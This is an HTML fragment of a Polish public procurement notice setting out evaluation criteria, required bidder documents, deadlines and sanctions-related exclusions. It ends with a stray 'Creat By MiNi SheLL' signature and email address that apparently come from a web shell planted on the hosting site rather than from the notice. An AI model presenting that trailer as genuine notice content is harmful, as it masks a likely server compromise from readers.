class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	FORMULARZ OFERTY – sporządzony zgodnie ze wzorem stanowiącym Załącznik nr 1 do SWZ<br/>Wykonawca w formularzu ofertowym musi wskazać:<br/>•	cenę, <br/>•	okres gwarancji.<br/><br/>•	okres gwarancji (liczony w miesiącach),<br/>W formularzu ofertowym okres gwarancji zamówienia należy wskazać poprzez zaznaczenie jednego odpowiedniego wariantu. Nie zaznaczenie żadnego z wariantów, a także zaznaczenie więcej niż jednego wariantu będzie skutkowało odrzuceniem oferty jako niezgodnej z treścią specyfikacji warunków zamówienia.<br/><br/>Wszystkie wykropkowane miejsca w formularzu ofertowym muszą być wypełnione przez Wykonawcę, w szczególności poprzez wskazanie wszystkich oznaczeń nadanych przez producenta oferowanego sprzętu.<br/>Brak wskazania powyższych informacji będzie skutkował odrzuceniem oferty jako niezgodnej <br/>z warunkami zamówienia.<br/><br/>2)	W celu wykazania braku podstaw do wykluczenia w postępowaniu Zamawiający wymaga złożenia wraz z ofertą OŚWIADCZENIA, O KTÓRYM MOWA W ART. 125 UST. 1 USTAWY PZP - w zakresie wskazanym przez Zamawiającego, którego wzór stanowi załącznik nr 2 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wielu Wykonawców, oświadczenie, o którym mowa powyżej, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/><br/>3)	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy ODPISU LUB INFORMACJI Z:<br/>a)	KRAJOWEGO REJESTRU SĄDOWEGO lub <br/>b)	CENTRALNEJ EWIDENCJI I INFORMACJI O DZIAŁALNOŚCI GOSPODARCZEJ lub <br/>c)	INNEGO WŁAŚCIWEGO REJESTRU.<br/><br/>4)	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt. 3), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał w ofercie dane umożliwiające dostęp do tych dokumentów.<br/>5)	Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ust. 3 Zamawiający żąda od Wykonawcy PEŁNOMOCNICTWA LUB INNEGO DOKUMENTU POTWIERDZAJĄCEGO UMOCOWANIE DO REPREZENTOWANIA WYKONAWCY.<br/>6)	Przepis ust 4) stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>7)	Wykonawcy wspólnie ubiegający się udzielenie zamówienia dołączają do oferty OŚWIADCZENIE SKŁADANE NA PODSTAWIE ART. 117 UST. 4 PZP, z którego wynika, które usługi wykonają poszczególni wykonawcy (wzór stanowi załącznik nr 3 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, nazwy oraz adresy wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz nazwę i adres ustanowionego pełnomocnika i zakres jego umocowania.<br/>2) W przypadku, o którym mowa powyżej, wykonawcy wspólnie ubiegający się udzielenie zamówienia dołączają do oferty oświadczenie składane na podstawie art. 117 ust. 4, z którego wynika, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian został opisany w projekcie umowy stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem formularza do złożenia oferty dostępnego na Platformie Zakupowej, adres strony https://platformazakupowa.pl/transakcja/1067749</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-26 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający, stosownie do treści art. 7 ust 1 ustawy z 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, wykluczy z postępowania o udzielenie zamówienia wykonawcę:<br/>1)	wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy,<br/>2)	którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy,<br/>3)	którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com